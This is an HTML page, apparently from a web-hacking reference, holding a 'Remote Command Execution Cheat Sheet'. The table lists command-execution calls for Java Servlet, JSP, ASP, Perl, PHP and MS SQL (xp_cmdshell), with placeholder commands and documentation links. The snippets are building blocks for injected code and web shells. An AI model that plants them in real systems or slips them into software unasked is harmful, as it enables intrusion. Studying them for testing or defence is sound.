<html>
<head>
<title>Web Hacking. cd hack. cs hack. hacked godzilla. </title>
<META http-equiv="Content-Type" content="text/html; charset=windows-1251">
<META NAME="robots" CONTENT="index all, follow">
</head>

<div class=Section1>

<p class=doctext><span lang=EN-GB>This table provides a handy list of
techniques that can be used for remote command execution, by language.</span></p>

<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
 style='width:100.0%'>
 <tr>
  <td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
  <h5 align=center style='text-align:center'><a name=app03table01></a><span
  lang=EN-GB style='font-size:10.5pt;font-family:Arial'>Table: Remote
  Command Execution Cheat Sheet</span></h5>
  </td>
 </tr>
 <tr>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Web Application Environment</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
  <td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Source Code</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
  <td valign=bottom style='padding:.75pt .75pt .75pt .75pt'>

  <p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
  font-family:Arial;color:black'>Additional Information</span></b></span><b><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Java Servlet </span></p>
  </td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre><span lang=EN-GB>class Example</span></pre><pre><span
  lang=EN-GB>     extends HTTPServlet</span></pre><pre><span lang=EN-GB>{</span></pre><pre><span
  lang=EN-GB>     .</span></pre><pre><span lang=EN-GB>     .</span></pre><pre><span
  lang=EN-GB>     .</span></pre><pre><span lang=EN-GB>     void function()</span></pre><pre><span
  lang=EN-GB>     {</span></pre><pre><span lang=EN-GB>Runtime r = Runtime.getRuntime();</span></pre><pre><span
  lang=EN-GB>Process p = r.exec(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;,</span></pre><pre><span
  class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>}</pre><pre>     .</pre><pre>     .</pre><pre>     .</pre><pre>}</pre></td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
  target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>
  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Java Server Pages (JSP) </span></p>

  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'><pre>&lt;%</pre><pre>     Runtime r =</pre><pre>Runtime.getRuntime();</pre><pre>     Process p =</pre><pre>r.exec(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;,</pre><pre><span
  class=docemphasis1>&lt;arguments&gt;</span>);</pre><pre>%&gt;</pre></td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html"
  target="_blank"><span style='color:#003399'>http://java.sun.com/j2se/1.4/docs/api/java/lang/Runtime.html</span></a>

  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>Active Server Pages (ASP) </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=doctext><span lang=EN-GB>If Windows Scripting Host</span></p>
  <p class=doctext><span lang=EN-GB>is installed on the target</span></p>
  <p class=doctext><span lang=EN-GB>system:</span></p>
  <pre><span lang=EN-GB>&lt;%</span></pre><pre><span lang=EN-GB>     Set wsh =</span></pre><pre><span
  lang=EN-GB>Server.CreateObject(&quot;Wscript.shell&quot;)</span></pre><pre><span
  lang=EN-GB>     </span>wsh.run(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</pre><pre>%&gt;</pre></td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a
  href="zhttp://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp"
  target="_blank"><span style='color:#003399'>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/script56/html/wsMthRun.asp</span></a>
  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>PERL </span></p>

  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=doctext><span lang=EN-GB>In PERL, commands are executed by wrapping
  them with the backtick symbol (`)</span></p>
  <p class=doctext><span lang=EN-GB>$result = `<span class=docemphasis1>&lt;command&gt;</span>`;</span></p>
  <p class=doctext><span lang=EN-GB>or</span></p>
  <p class=doctext><span lang=EN-GB>system(&quot;<span class=docemphasis1>&lt;command&gt;</span>&quot;);</span></p>

  <p class=doctext>or</p>
  <p class=doctext>open(IN, &quot;<span class=docemphasis1>&lt;command&gt;</span>
  |&quot;);</p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a href="http://www.perldoc.com/perl5.6/pod/perlfunc.html"
  target="_blank"><span style='color:#003399'>http://www.perldoc.com/perl5.6/pod/perlfunc.html</span></a>

  </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>PHP </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=doctext><span lang=EN-GB>&lt;? system(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
  <p class=doctext><span lang=EN-GB>or</span></p>
  <p class=doctext><span lang=EN-GB>&lt;? shell_exec(&quot;<span
  class=docemphasis1>&lt;command&gt;</span>&quot;) ?&gt;</span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>

  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'><a href="http://www.php.net/manual/en/function.shell-exec.php"
  target="_blank"><span lang=EN-GB style='color:#003399'>http://www.php.net/manual/en/function.shell-exec.php</span></a></span><span
  style='font-size:10.5pt;font-family:Arial;color:black'> </span></p>
  </td>
 </tr>
 <tr>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
  color:black'>MS SQL </span></p>
  </td>

  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
  color:black'>EXEC master..xp_cmdshell&quot; &lt;command&gt;&quot; </span></p>
  </td>
  <td valign=top style='padding:.75pt .75pt .75pt .75pt'>
  <p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
  color:black'>&nbsp;</span></p>
  </td>
 </tr>

</table>


</div>


<br>



</body>

</html>

